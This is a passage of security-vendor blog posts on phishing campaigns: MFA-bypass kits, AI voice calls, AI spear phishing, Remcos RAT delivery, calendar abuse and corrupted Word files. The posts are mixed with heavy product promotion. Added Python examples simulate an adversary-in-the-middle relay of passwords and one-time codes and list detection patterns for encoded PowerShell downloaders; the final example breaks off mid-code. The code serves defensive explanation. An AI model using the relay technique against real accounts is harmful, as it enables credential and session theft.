such as Sneaky 2FA make it easy for cybercriminals to conduct phishing attacks and defeat MFA; however, they are not effective against phishing-resistant MFA such as FIDO2/WebAuthn authenticators (hardware security keys or platform authenticators, including those unlocked with a biometric), because the authenticator’s signed response is bound to the origin of the site the browser is actually on. 
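The outcome described in both the Astaroth post and the Sneaky 2FA post (a relayed password and one-time code yields a session cookie the attacker can use, whether the relay is a reverse proxy or a server talking to the provider's API directly) and the reason an origin-bound credential survives it can be shown in a small simulation. The following is an added example written for this page; it is not code from either kit, from Sekoia, or from TitanHQ. The two origins, the user "alice", her password, the TOTP secret and the credential key are constructed, and an HMAC over the client data stands in for the ECDSA signature a real WebAuthn authenticator produces. The `totp` function is the real RFC 6238 algorithm.

```python
import hashlib, hmac, json, secrets, struct

IDP_ORIGIN = "https://login.example.com"           # assumed legitimate login origin
PHISH_ORIGIN = "https://login-example-verify.com"  # assumed attacker-controlled phishing host


def totp(secret: bytes, t: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP (HMAC-SHA1), the code an authenticator app or SMS step would produce."""
    mac = hmac.new(secret, struct.pack(">Q", t // step), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = (struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF) % 10 ** digits
    return f"{code:0{digits}d}"


class IdentityProvider:
    """Toy identity provider: password+TOTP, or a WebAuthn-style origin-bound assertion."""

    def __init__(self):
        self.users, self.sessions, self.challenges = {}, {}, {}

    def register(self, user, password):
        # cred_key stands in for the public key of a registered WebAuthn credential (HMAC, not ECDSA)
        self.users[user] = {"password": password, "totp_secret": secrets.token_bytes(20),
                            "cred_key": secrets.token_bytes(32)}
        return self.users[user]

    def login_totp(self, user, password, code, now):
        u = self.users.get(user)
        if not u or not hmac.compare_digest(u["password"], password):
            return None
        if not hmac.compare_digest(totp(u["totp_secret"], now), code):
            return None
        return self._issue_session(user)  # a bearer cookie: whoever holds it is the user

    def webauthn_challenge(self, user):
        self.challenges[user] = secrets.token_hex(16)
        return self.challenges[user]

    def login_webauthn(self, user, client_data, signature):
        u = self.users.get(user)
        if not u:
            return None
        data = json.loads(client_data)
        expected = hmac.new(u["cred_key"], client_data.encode(), hashlib.sha256).digest()
        if data.get("challenge") != self.challenges.pop(user, None):
            return None
        if data.get("origin") != IDP_ORIGIN:  # origin binding: the check a relay cannot satisfy
            return None
        if not hmac.compare_digest(expected, signature):
            return None
        return self._issue_session(user)

    def whoami(self, cookie):
        return self.sessions.get(cookie)

    def _issue_session(self, user):
        cookie = secrets.token_hex(16)
        self.sessions[cookie] = user
        return cookie


class Authenticator:
    """Browser plus authenticator: signs the challenge together with the origin the page was loaded from."""

    def __init__(self, cred_key):
        self.cred_key = cred_key

    def sign(self, challenge, page_origin):
        client_data = json.dumps({"challenge": challenge, "origin": page_origin})
        return client_data, hmac.new(self.cred_key, client_data.encode(), hashlib.sha256).digest()


class AitMProxy:
    """The phishing site: relays whatever the victim submits to the real IdP and keeps the result."""

    def __init__(self, idp):
        self.idp, self.captured = idp, []  # captured is what the kit's admin panel would show

    def relay_totp(self, user, password, code, now):
        cookie = self.idp.login_totp(user, password, code, now)
        self.captured.append({"user": user, "password": password, "otp": code, "cookie": cookie})
        return cookie

    def relay_webauthn(self, user, authenticator):
        challenge = self.idp.webauthn_challenge(user)  # fetched from the IdP and shown to the victim
        # The victim's browser is on the phishing origin, so that is the origin that gets signed.
        client_data, sig = authenticator.sign(challenge, PHISH_ORIGIN)
        return self.idp.login_webauthn(user, client_data, sig)


def demo(now=1_700_000_000):
    idp = IdentityProvider()
    u = idp.register("alice", "correct horse")
    proxy = AitMProxy(idp)
    stolen = proxy.relay_totp("alice", "correct horse", totp(u["totp_secret"], now), now)
    relayed = proxy.relay_webauthn("alice", Authenticator(u["cred_key"]))
    cd, sig = Authenticator(u["cred_key"]).sign(idp.webauthn_challenge("alice"), IDP_ORIGIN)
    direct = idp.login_webauthn("alice", cd, sig)
    return {"totp_relay": idp.whoami(stolen),       # attacker now holds a live session as alice
            "webauthn_relay": idp.whoami(relayed),  # None: origin mismatch, assertion rejected
            "webauthn_direct": idp.whoami(direct)}  # legitimate login from the real origin works


if __name__ == "__main__":
    print(demo())
```

The relayed password and TOTP code produce a cookie that `whoami` resolves to alice, which is exactly the session-hijacking step the kits automate; the same relay of a WebAuthn assertion is refused because the signed client data names the phishing origin, and the IdP only accepts its own. On the detection side the same property is useful: a password-plus-OTP success followed within seconds by session use from a different client than the one that logged in is the pattern to hunt for in identity provider logs.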
The problem is that these forms of MFA can be expensive and difficult to deploy at scale.\r\nBusinesses can greatly improve their defenses with advanced spam filter software with AI and machine learning detection, email sandboxing, URL rewriting, QR code checks, greylisting, SPF, DKIM, and DMARC checks, and banners identifying emails from external sources. Effective email filtering will ensure that these malicious emails do not land in employee inboxes. TitanHQ offers two email security solutions: SpamTitan email security and the PhishTitan anti-phishing solution for M365. The engine that powers both solutions was recently rated in 1st place for protection in the Q4 2024 tests by VirusBulletin, achieving a 100% malware and 100% phishing detection rate.\r\nRegular security awareness training should also be provided to all members of the workforce to raise awareness of threats and to teach cybersecurity best practices. With the SafeTitan security awareness training platform it is easy to create and automate training courses and add in new training content when new threat actor tactics are identified. 
The platform also includes a phishing simulator for reinforcing training and identifying individuals in need of additional training.\r\nFor more information on improving your defenses against phishing and malware, give the TitanHQ team a call. Product demonstrations can be arranged on request and all TitanHQ solutions are available on a free trial.\r\nAI-Generated Voice Phishing Calls Combined with Email to Steal Gmail Credentials\r\nby G Hunt | January 26, 2025 | Phishing \u0026 Email Spam\r\nCybercriminals often devise phishing lures that can be used on as many individuals as possible, which is why they often impersonate big-name brands such as Microsoft, Apple, Facebook, and Google, since there is a high probability that the emails will land in the inbox of someone who uses the products of those companies.\r\nIn the case of Google, a phishing campaign targeting Gmail account holders makes sense from the perspective of a cybercriminal as there are around 2.5 billion Gmail users worldwide. One such campaign has recently been identified that uses a combination of an email and a phone call to obtain account credentials. Email accounts can contain a wealth of sensitive information that can be misused or used in further attacks on an individual, and the accounts can be used for phishing and spear phishing campaigns.\r\nPhishing campaigns that combine multiple communication methods are becoming more common, such as callback phishing. With callback phishing, the scam starts with an email devoid of malicious links, scripts, and attachments. The recipient is told that a charge will be applied to their account for a subscription or free trial that is coming to an end. The user is informed that they must call the number in the email to terminate the subscription before the charge is applied. 
If the number is called, the threat actor uses social engineering techniques to trick the user into downloading a remote access solution, supposedly to remove the software and prevent the charge. The software gives the threat actor full control of the device.\r\nThe latest campaign uses emails and phone calls in the opposite order, with initial contact made via the phone by a person impersonating the Google support team. The reason given for the phone call is to advise the Gmail user that their account has been compromised or suspended due to suspicious activity, or that attempts are being made to recover access.\r\nOne user received a call in which a purported Google customer support worker told them that a family member was trying to gain access to their account and had provided a death certificate. The call was said to be to verify the validity of the family member’s claim. People targeted in this campaign may attempt to verify the validity of the call by checking the phone number; however, Caller ID is spoofed to make it appear that the call has come from a legitimate Google customer support number.\r\nThe second phase of the scam is an email sent to the user’s Gmail account corroborating the matter discussed in the phone call, with the email requiring action to recover the account and reset the password. A link is provided that directs the user to a spoofed login page where they are required to enter their credentials, which are captured by the scammer. There have also been reports where initial contact is made via email, with a follow-up telephone call.\r\nPerforming such a scam at scale would require a great deal of manpower, and while telephone scams are commonly conducted by call center staff in foreign countries, this scam involves AI-generated calls. 
The caller sounds professional and polite and has a native accent, but the victim is not conversing with a real person. The reason for the call is plausible, the voice very realistic, and the scam is capable of fooling even security-conscious individuals.\r\nBusinesses looking to improve their defenses against advanced phishing scams should ensure that they cover these types of sophisticated phishing attempts in their security awareness training programs. Employees should be told that threat actors may use a variety of methods for contact, often combining more than one communication method in the same scam. Keeping employees up to date on the latest tactics used by scammers is straightforward with the SafeTitan security awareness training platform. New training content can easily be created in response to changing tactics to keep the workforce up to date on the latest scams. SafeTitan also includes a phishing simulator for reinforcing training.\r\nAn advanced email security solution is also strongly recommended for blocking the email-based component of these sophisticated phishing scams. SpamTitan cloud-based anti-spam software incorporates machine learning capable of identifying previously unseen phishing scams, ensuring phishing attempts are blocked and do not land in inboxes. In recent independent tests at VirusBulletin, SpamTitan achieved the top spot due to comprehensive detection rates, blocking 100% of malware and phishing emails, and 99.999% of spam emails. To block sophisticated AI-generated phishing attempts you need sophisticated AI-based defenses. 
Give the TitanHQ team a call today to find out more about improving your defenses against AI-based attacks.\r\nAI-Generated Phishing Emails Trick More Than 50% of Recipients\r\nby G Hunt | January 15, 2025 | Phishing \u0026 Email Spam\r\nLarge language models (LLMs) are used for natural language processing tasks and can generate human-like responses after being trained on vast amounts of data. The most capable LLMs are generative pretrained transformers, or GPTs, the most popular of which is ChatGPT, although there are many others, including the China-developed DeepSeek app.\r\nThese AI-powered tools have proven incredibly popular and are used for a wide range of tasks, eliminating a great deal of human effort. They are used for creating articles, resumes, and job applications, completing homework, translating from one language to another, summarizing text to pull out the key points, and writing and debugging code, to name just a few applications.\r\nWhen these artificial intelligence tools were released for public use, security professionals warned that in addition to the beneficial uses, they could easily be adopted by cybercriminals for malicious purposes such as writing malware code, phishing/spear phishing, and social engineering.\r\nGuardrails were implemented by the developers of these tools to prevent them from being used for malicious purposes, but those controls can be circumvented. Further, LLMs that lack the restrictions of tools such as ChatGPT and DeepSeek have been made available specifically for use by cybercriminals.\r\nEvidence has been growing that cybercriminals are actively using LLMs for malicious purposes, including writing flawless phishing emails in multiple languages. 
Human-written phishing emails often contain spelling mistakes and grammatical errors, making them relatively easy for people to identify, but AI-generated phishing emails lack these easily identified red flags.\r\nWhile cybersecurity professionals have predicted that AI-generated phishing emails could potentially be far more effective than human-generated emails, it has been unclear how effective these AI-generated messages are at achieving the intended purpose: tricking the recipient into disclosing sensitive data such as login credentials, opening a malicious file, or taking some other action that satisfies the attacker’s nefarious aims.\r\nA recently conducted study set out to explore how effective AI-generated spear phishing emails are at tricking humans compared to human-generated phishing attempts. The study confirmed that AI tools have made life much easier for cybercriminals by saving them a huge amount of time. Worryingly, these tools also significantly improve click rates.\r\nFor the study, researchers from Harvard Kennedy School and Avant Research Group developed an AI-powered tool capable of automating spear phishing campaigns. Their AI agents were based on GPT-4o and Claude 3.5 Sonnet, which were used to crawl the web to identify information on individuals who could be targeted and to generate personalized phishing messages.\r\nThe bad news is that they achieved an astonishing 54% click-through rate (CTR), compared to a CTR of 12% for standard phishing emails. In a comparison with phishing emails generated by human phishing experts, a similar CTR was achieved with the human-generated phishing emails; however, the human version cost 30% more than the AI automation tools.\r\nWhat made the phishing emails so effective was the level of personalization. 
Spear phishing is a far more effective\r\nstrategy than standard phishing, but these attacks take a lot of time and effort. By using AI, the time taken to\r\nobtain the personal information needed for the phishing attempt and develop a lure relevant to the targeted\r\nindividual was massively reduced. In the researchers’ campaign, the web was scraped for personal information\r\nand the targeted individuals were invited to participate in a project that aligned with their interests. They were then\r\nprovided with a link to click for further information. In a genuine malicious campaign, the linked site would be\r\nused to deliver malware or capture credentials.\r\nAI-generated phishing is a major cause of concern, but there is good news. AI tools can be used for malicious\r\npurposes, but they can also be used for defensive purposes and can identify the phishing content that humans\r\nstruggle to identify. Security professionals should be concerned about AI-generated phishing, but email security\r\nsolutions such as SpamTitan can give them peace of mind.\r\nSpamTitan, TitanHQ’s cloud-based anti-spam service, has AI and machine learning capabilities that can identify\r\nhuman-generated and AI-generated phishing attempts, and email sandboxing for detecting zero-day malware\r\nthreats. In recent independent tests, SpamTitan outperformed all other email security solutions and achieved a\r\nphishing and malware catch rate of 100%, a spam catch rate of 99.999%, with a 0.000% false positive rate. When\r\ncombined with TitanHQ’s security awareness training platform and phishing simulator – SafeTitan, security teams\r\nwill be able to sleep easily.\r\nFor more information about SpamTitan, SafeTitan, and other TitanHQ cybersecurity solutions for businesses and\r\nmanaged service providers, give the TitanHQ team a call. 
All TitanHQ solutions are available on a free trial and\r\nproduct demonstrations can be arranged on request.\r\nRemcos RAT Infections on the Rise as Threat Actors Adopt New Phishing Tactics\r\nby G Hunt | December 29, 2024 | Phishing \u0026 Email Spam, Spam Software\r\nDetections of the Remcos remote access trojan (RAT) have increased recently with threat actors adopting new\r\ntactics to deliver this popular commercially available malware. The Remcos RAT is offered under the malware-as-a-service model, where purchasers can use the malware to remotely control infected devices and steal sensitive\r\ndata.\r\nThe Remcos RAT is primarily delivered via phishing emails with malicious attachments, with each of the two\r\nmain variants delivered using distinct methods. One of the variants is distributed in phishing emails using\r\nMicrosoft Office Open XML attachments that exploit a Microsoft Office memory corruption remote code\r\nexecution vulnerability (CVE-2017-11882) to execute an embedded script that downloads an intermediate payload\r\nthat will in turn deliver the Remcos RAT. The vulnerability does not affect newer Office versions, such as\r\nMicrosoft 365, only older versions prior to Office 2016.\r\nLures commonly used include fake purchase orders, where the email claims to include purchasing specifications\r\nin the attached Excel file. If opened, the spreadsheet is blurred and the user is told the document is protected, and\r\nto enable editing to view the file. In the background, the vulnerability is exploited to deliver and execute an HTA\r\nfile, triggering the processes that lead to the installation of the Remcos RAT. 
When delivered, the Remcos RAT is\r\ninjected into a legitimate Windows executable (RegAsm.exe).\r\nThe second variant uses a VBS attachment with an obfuscated PowerShell script to download files from a remote\r\nserver and inject code into RegAsm.exe. Since the final payload is injected into legitimate Windows processes, the\r\nmalware is often not detected by security solutions. Once installed, persistence is maintained via registry\r\nmodifications to ensure the malware remains active after a reboot. Lures used to deliver this variant include\r\npayment confirmations, with details included in the attached DOCX file.\r\nThe highest number of infections has occurred in the United States and India, and there has been a sharp rise in\r\ninfections in recent months, showing that the campaigns are proving effective. A combination of technical\r\nmeasures and security awareness training will help to prevent Remcos RAT infections. Phishing campaigns such\r\nas this show why it is important to stay on top of patching and ensure that all systems are kept up to date, and to\r\nmigrate from software that has reached end-of-life to supported software versions. Endpoint security software is\r\nimportant; however, detection of the Remcos RAT can be difficult since files are not written to the hard drive.\r\nThe primary defense is an advanced email security solution. SpamTitan, TitanHQ’s spam filtering service, is an\r\nideal choice as it includes reputation checks, SPF, DKIM, \u0026 DMARC, machine-learning algorithms to identify\r\nanomalies in emails, and email sandboxing, where attachments are sent for extensive analysis including pattern\r\nfiltering. In recent tests by VirusBulletin, the engine that powers SpamTitan scored highest out of all 11 tested\r\nemail security solutions, with a 100% malware and phishing catch rate.\r\nIt is important to keep the workforce up to date on the latest security threats and to teach and reinforce security\r\nbest practices. 
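As an added illustration, not TitanHQ’s code, the Python below turns the delivery chain just described into a detection rule over process-creation records: an Office application launching mshta.exe to run the dropped HTA, a script host launching hidden or encoded PowerShell, and RegAsm.exe started from either chain. The records, their field names and the file paths are constructed for this example.

```python
"""Heuristic detection for the two Remcos RAT delivery chains described above.

Added example, not TitanHQ/SpamTitan code. The process-creation records below
are constructed sample data; the field names (parent, image, cmdline) are an
assumption of this example, not a specific product's log schema.
"""
import ntpath
from dataclasses import dataclass
from typing import List, Optional, Tuple

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Parents from which RegAsm.exe (the .NET assembly registration tool) should not
# normally be started; the post reports both variants injecting into it.
UNEXPECTED_REGASM_PARENTS = OFFICE_APPS | SCRIPT_HOSTS | {"powershell.exe", "mshta.exe"}
# Command-line fragments typical of obfuscated or hidden PowerShell launches.
OBFUSCATION_HINTS = ("-enc", "-encodedcommand", "frombase64string", "invoke-expression",
                     "iex(", "downloadstring", "-w hidden", "-windowstyle hidden")


@dataclass
class ProcEvent:
    parent: str   # full path of the parent process image
    image: str    # full path of the created process image
    cmdline: str  # command line of the created process


def classify(ev: ProcEvent) -> Optional[str]:
    """Return a detection tag for one event, or None if it matches no chain stage."""
    parent = ntpath.basename(ev.parent).lower()
    image = ntpath.basename(ev.image).lower()
    cmd = ev.cmdline.lower()
    # Variant 1: the Office document exploit drops and runs an HTA (mshta.exe hosts HTA files).
    if parent in OFFICE_APPS and image == "mshta.exe":
        return "office-spawned-hta"
    # Variant 2: the VBS attachment launches an obfuscated PowerShell downloader.
    if parent in SCRIPT_HOSTS and image == "powershell.exe" and any(h in cmd for h in OBFUSCATION_HINTS):
        return "script-host-obfuscated-powershell"
    # Both variants: the payload is injected into RegAsm.exe started from a script or Office chain.
    if image == "regasm.exe" and parent in UNEXPECTED_REGASM_PARENTS:
        return "regasm-injection-target"
    return None


def scan(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Run classify over a batch and return (index, tag) for every hit."""
    hits = []
    for i, ev in enumerate(events):
        tag = classify(ev)
        if tag:
            hits.append((i, tag))
    return hits


# Constructed sample events: three stages of the chain plus two benign records.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\System32\mshta.exe",
              r"mshta.exe C:\Users\alice\AppData\Local\Temp\PO_4471.hta"),
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -enc QQBCAEMA"),  # encoded argument is a constructed placeholder
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
              "RegAsm.exe"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              "WINWORD.EXE /n report.docx"),            # benign: user opens Word
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
              "RegAsm.exe /codebase app.dll"),          # benign: installer registering an assembly
]

if __name__ == "__main__":
    for idx, tag in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {tag}")
```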
The SafeTitan security awareness training platform makes this easy for businesses and MSPs,\r\nallowing effective security awareness training programs to be created that are tailored to individuals and user\r\nroles. The training can be automated to be delivered regularly to employees, as can phishing simulations using the\r\nSafeTitan phishing simulator to test the effectiveness of training. Businesses with Microsoft 365 would benefit\r\nfrom the PhishTitan platform. Based on the same engine that powers SpamTitan, PhishTitan helps to protect\r\nMicrosoft 365 environments from the advanced threats that Microsoft fails to block, adds banners to emails from\r\nexternal sources, and helps security teams rapidly mitigate phishing threats.\r\nGoogle Calendar Abused in Phishing Campaign\r\nby G Hunt | December 28, 2024 | Phishing \u0026 Email Spam\r\nCompanies in multiple sectors are being targeted in an ongoing phishing campaign involving initial contact via\r\nGoogle Calendar-generated meeting invites sent by email. This campaign has proven effective, especially when the\r\nuser recognizes other guests. The campaign has been active throughout December, with at least 1,000 of these\r\nphishing emails identified each week, according to Check Point.\r\nThe aim of the phishing emails is to trick the recipients into clicking a link in the email or opening a Calendar file\r\nattachment (.ics), both of which will send the user to either Google Forms or Google Drawings. Next, the user is\r\ntricked into clicking another link, which could be a support button or a fake reCAPTCHA. A click will drive the\r\nuser to the scam page, where they will be taken through a fake authentication process that captures personal\r\ninformation, and ultimately payment card information. 
This campaign could easily be adapted to obtain\r\ncredentials rather than payment card details, and campaigns in the past that abused Google Calendar have targeted\r\ncredentials.\r\nAn attacker only needs to obtain an individual’s email address to send the calendar invite, and the emails look\r\nexactly like a genuine invite for a meeting. Since the legitimate Google Calendar service is used to generate the\r\nphishing invites, the emails are generally not blocked by spam filtering services. Since the sender is legitimate and\r\ntrusted, the emails pass SPF, DKIM, and DMARC checks, guaranteeing delivery.\r\nDepending on the user’s settings, these invites may be automatically added to the user’s calendar. The threat actor can\r\nthen trigger a second email by canceling the meeting and has been doing so in this campaign. The cancellation\r\nemail also includes a hyperlink to a malicious website.\r\nThe use of Google Calendar invites in phishing is nothing new. It is effective as it ensures a large number of\r\nrequests land in inboxes, and Google Calendar will be familiar to most people, considering there are more than\r\n500 million active users of the tool.\r\nThere are simple steps to take to block these threats, although the first option will also limit legitimate\r\nfunctionality for genuine invites. To block these attempts, go into Google Calendar settings, and in the event\r\nsettings switch from “automatically add invitations” to “only show invitations I have responded to”. Also, access\r\nGmail settings and uncheck “automatically add events from Gmail to my calendar”. 
To avoid disabling the\r\nfunctionality, check the “only known individuals” setting in Google Calendar, which will generate an alert if the user\r\nhas had no previous interactions with the sender.\r\nIt is important to have an advanced email security solution that is capable of detecting sophisticated phishing\r\nattacks that bypass the standard reputation checks that are present in virtually all spam filtering software – SPF,\r\nDKIM, and DMARC. Advanced spam filtering solutions incorporate AI and machine learning capabilities and can\r\ndetect anomalies in inbound emails and flag them as suspicious or send them for deeper inspection in an email\r\nsandbox. In the sandbox, the message can be analyzed for malicious content, including following the link to check\r\nthe destination URL. While this campaign does not use malware, an email filtering service with email sandboxing\r\nwill also protect against malware threats.\r\nMeeting invites, calendar invites, and collaboration requests are commonly used in phishing campaigns and are\r\nsent from trusted domains that often bypass spam filtering controls, so it is important to cover these types of scam\r\nemails in security awareness training. Employees should be made aware that these requests may not be what they\r\nseem, even if they have been sent via a legitimate service. Businesses can also gauge how susceptible employees\r\nare to these types of scams using a phishing simulator. 
SafeTitan includes many phishing templates involving\r\ninvites from legitimate services to allow businesses to incorporate these into their simulations.\r\nCall TitanHQ today for more information on improving your defenses against phishing with the SafeTitan security\r\nawareness training platform, SpamTitan email security, and the PhishTitan anti-phishing solution for Microsoft\r\n365.\r\nTitanHQ Achieves 1st Place in Q4 Virus Bulletin Email Security Tests\r\nby G Hunt | December 23, 2024 | Industry News, Spam Software\r\nTitanHQ’s email security solutions achieved first place in Q4 performance tests by the leading security\r\ninformation portal, testing, and certification body, VirusBulletin. The security engine that powers TitanHQ’s\r\nSpamTitan email security and PhishTitan anti-phishing platform for Microsoft 365 was put to the test alongside 10\r\nother market-leading email security solutions and achieved the highest overall score out of all 11 solutions,\r\nbuilding on the joint 1st overall score in the Q3, 2024 round of tests, 2nd position in the Q2 tests, and 3rd position\r\nin the Q1, 2024 tests.\r\nThe top position was achieved with a 100% phishing catch rate, a 100% malware catch rate, and a 0.00% false\r\npositive rate. This was the third consecutive quarter that TitanHQ’s solutions had a perfect score for catching\r\nmalware and the third consecutive quarter that TitanHQ has been awarded the VBSpam+ award for outstanding\r\nperformance. “We are thrilled to have significantly outperformed our main competitors and surpassed the industry\r\naverage,” said TitanHQ CEO, Ronan Kavanagh. “Our unwavering commitment to providing unmatched email\r\nsecurity is evident in these results, and we remain dedicated to protecting our clients from evolving cyber threats.”\r\nOver the past two decades, VirusBulletin has tested, reviewed, and benchmarked enterprise-level security\r\nsolutions to determine how effective the solutions are at blocking real-world threats. 
VirusBulletin has a\r\nformidable reputation for providing businesses with invaluable independent intelligence about the rapidly\r\nevolving threat landscape, and businesses look to performance tests when selecting security solutions to make sure\r\nthey perform as well as the vendors claim. For the Q4, 2024 tests of enterprise-level anti-spam software,\r\nTitanHQ’s cloud-based anti-spam service was put to the test alongside solutions from Bitdefender, Fortinet,\r\nMimecast, N-able, Sophos, Rspamd, SEPPmail, Net at Work, and Zoho. The tests ran for 16 days in November\r\n2024 and included evaluations of almost 107,000 emails, of which 105,228 were spam and 1,315 were legitimate\r\nemails. 1,045 of the emails contained a malicious attachment and 16,825 contained a link to a web page hosting\r\nphishing content or malware.\r\nVirus Bulletin Q4, 2024 Test Scores\r\nMetric | TitanHQ Score\r\nMalware catch rate | 100.000%\r\nPhishing catch rate | 100.000%\r\nSpam Catch (SC) rate | 99.999%\r\nProject Honey Pot SC rate | 99.998%\r\nMXMailData SC rate | 100.000%\r\nAbusix SC rate | 99.999%\r\nFalse Positive (FP) rate | 0.000%\r\nNewsletters FP rate | 0.0%\r\nFinal Score | 99.999%\r\n“With only two spam samples missed – one of which was from the unwanted category – no false positives of any\r\nkind, and a final score value of 99.999, SpamTitan showed the best performance in this test, ranking top for final\r\nscore,” explained VirusBulletin. “Needless to say, a well-deserved VBSpam+ certification is awarded.”\r\nVirus Bulletin 2024 Test Scores\r\nTest Period | Phishing Catch Rate | Malware Catch Rate | Spam Catch Rate | Position\r\nQ1 | 99.91% | 99.95% | 99.98% | 3rd\r\nQ2 | 99.99% | 100% | 99.98% | 2nd\r\nQ3 | 99.98% | 100% | 99.98% | 1st (Joint)\r\nQ4 | 100% | 100% | 99.99% | 1st\r\nThe test results confirm that TitanHQ is a leading enterprise spam filter provider; however, 
TitanHQ’s spam\r\nfiltering service and anti-phishing solution for M365 are suitable for use by businesses of all sizes. While\r\nincredibly powerful and feature-rich, they are easy to implement and use. The solutions have also been developed\r\nfrom the ground up to meet the needs of MSPs to help them better protect their clients from rapidly evolving\r\nthreats. “We’ve seen a remarkable influx of new MSP customers migrating from other solutions, consistently\r\nhighlighting TitanHQ’s ability to deliver immediate and substantial threat mitigation,” said Kavanagh.\r\nIf you want industry-leading email protection from spam, phishing, and malware, give the TitanHQ team a call\r\ntoday to find out more about getting started with SpamTitan and PhishTitan. Product demonstrations can be\r\narranged on request and all TitanHQ solutions are available on a free trial.\r\nSpamTitan Enhanced with Latest Skellig 9.07 Release\r\nby G Hunt | December 18, 2024 | Industry News, Spam Software\r\nTitanHQ has announced that the latest version of SpamTitan (Skellig 9.07) has been launched, offering significant\r\nenhancements to improve detection, usability, and overall security. 
The new version of SpamTitan Skellig builds\r\non previous versions that have been demonstrated to provide exceptional protection against malware, phishing,\r\nand spam, as evidenced by recent independent tests by VirusBulletin.\r\nIn Q3, 2024, SpamTitan achieved joint first place for overall score in the phishing, spam, and malware detection\r\ntests, and in Q4, 2024, performed even better, beating all other industry-leading competitors to achieve the top spot\r\nwith an overall score of 99.999%, including a malware and phishing catch rate of 100%, a spam catch rate of\r\n99.999%, and a false positive rate of 0.000%, earning SpamTitan its third consecutive VBSpam+ award.\r\nThe latest release of the SpamTitan Skellig engine includes numerous security updates, including significant\r\nimprovements with enhanced Domain and Display Name anti-spoofing protection and updated anti-spoofing\r\nscreens. The settings for Domain and Display Name anti-spoofing have been separated to make it easier to see\r\nwhich features have been enabled, and the update makes MSPs’ lives easier as these split options are available at\r\nthe customer level, so there is no need to drill down to each domain-level setting. The update will reduce the time\r\nthat needs to be spent managing security defenses. Further, the update provides greater flexibility and control for\r\ninbox protection, since Display Name anti-spoofing is independent of user policies. That means it is possible to\r\nupload a custom list of Display Name/email pairs for more targeted protection. To improve usability, changes have\r\nalso been made under the hood for Quarantine Reports to ensure they are delivered more reliably and on time.\r\nTitanHQ is committed to making continuous security improvements to improve detection and simplify security\r\nmanagement to make its products easier and less time-consuming to use, ensuring users have complete control of\r\nhow protections are applied. 
The new version will be updated automatically for current users, and if you are yet to\r\ntry our spam filtering service, give the TitanHQ team a call today for help getting you started with a free trial.\r\nThreat Actors Adopt Corrupted Word Files for Phishing Campaigns\r\nby G Hunt | December 16, 2024 | Phishing \u0026 Email Spam\r\nA new phishing campaign has been identified that uses the novel tactic of attaching corrupted Microsoft Word\r\nfiles to emails. The files themselves do not contain any malicious code, so scans of the attachments by email\r\nsecurity solutions may not flag the emails as malicious.\r\nIn order to get the recipient to open the email, the threat actor impersonates the HR department or payroll team, as\r\nemployees will typically open these messages. The attached files have file names related to payments, annual\r\nbenefits, and bonuses, which employees may open without performing standard checks of the email, such as\r\nidentifying the true sender of the message. Many employees place a moderate amount of trust in Word files, since even if\r\nthey contain a macro, it should not run automatically when the Word document is opened.\r\nThe threat actor relies on the employee’s curiosity to open the file and the way that operating systems handle\r\ncorrupted files. The file recovery feature of Microsoft Word will attempt to recover corrupted files. The user will\r\nbe informed that parts of the file contain unreadable content, and the user is prompted to confirm if they would\r\nlike the file to be recovered. 
The documents have been crafted to ensure that they can be recovered by Word, and\r\nthe recovery will present the user with a QR code that they are told they must scan to retrieve the document.\r\nThe document includes the logo of the company being targeted, and the user does not need to “enable editing” to\r\nview the contents of the document, so they may mistakenly believe they are safe. If they scan the QR code using\r\ntheir mobile device, they will be directed to a phishing page that is an exact match of the genuine Microsoft login\r\nprompt and asked to enter their Microsoft credentials.\r\nBusinesses with spam filter software may not be protected as email security solutions often fail to scan corrupted\r\nfiles. For instance, the phishing emails bypass Outlook spam filters according to the researchers at Any.Run who\r\nidentified the campaign. That means the emails may be delivered to inboxes, especially as the messages do not\r\ncontain any content in the body of the email indicative of a phishing attempt.\r\nIf the user opens the file and scans the QR code, they will switch from their desktop or laptop to their mobile\r\nphone. Mobile devices rarely have the same level of security protection, so corporate anti-phishing controls such\r\nas web filters will likely be bypassed.\r\nThreat actors are constantly developing new ways to trick employees in their phishing campaigns, which is why it\r\nis important to run security awareness training programs continuously, updating the training content with new\r\ntraining material in response to threat actors’ changing tactics. By warning employees about this method, they\r\nshould recognize the scam for what it is if they receive an email with a corrupted file attachment. That is easy to\r\ndo with a security awareness training platform such as SafeTitan. New training content can be quickly created and\r\nrolled out to all users as part of their monthly allocation of training modules. 
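As an added illustration, not SpamTitan’s own scanning logic, the Python below shows the check a mail gateway can apply so that a .docx that cannot be parsed is quarantined for sandbox or manual review rather than passed through because no malicious code was found in it. The sample attachment and its corrupted copy are constructed in memory, and the verdict labels and helper names are this example’s own.

```python
"""Treat corrupted .docx attachments as suspicious instead of unscannable.

Added example, not SpamTitan's scanning code. The attachment bytes are built
in memory here as constructed sample data; the verdict labels are this
example's own.
"""
import io
import zipfile

ZIP_MAGIC = b"PK\x03\x04"                      # every OOXML file is a zip container
REQUIRED_PARTS = ("[Content_Types].xml", "word/document.xml")


def build_sample_docx(include_document: bool = True) -> bytes:
    """Constructed minimal .docx: a zip with the parts Word expects (placeholder XML)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("_rels/.rels", "<Relationships/>")
        if include_document:
            z.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue()


def corrupt_container(data: bytes) -> bytes:
    """Constructed corruption: cut off the zip's end-of-central-directory record so the
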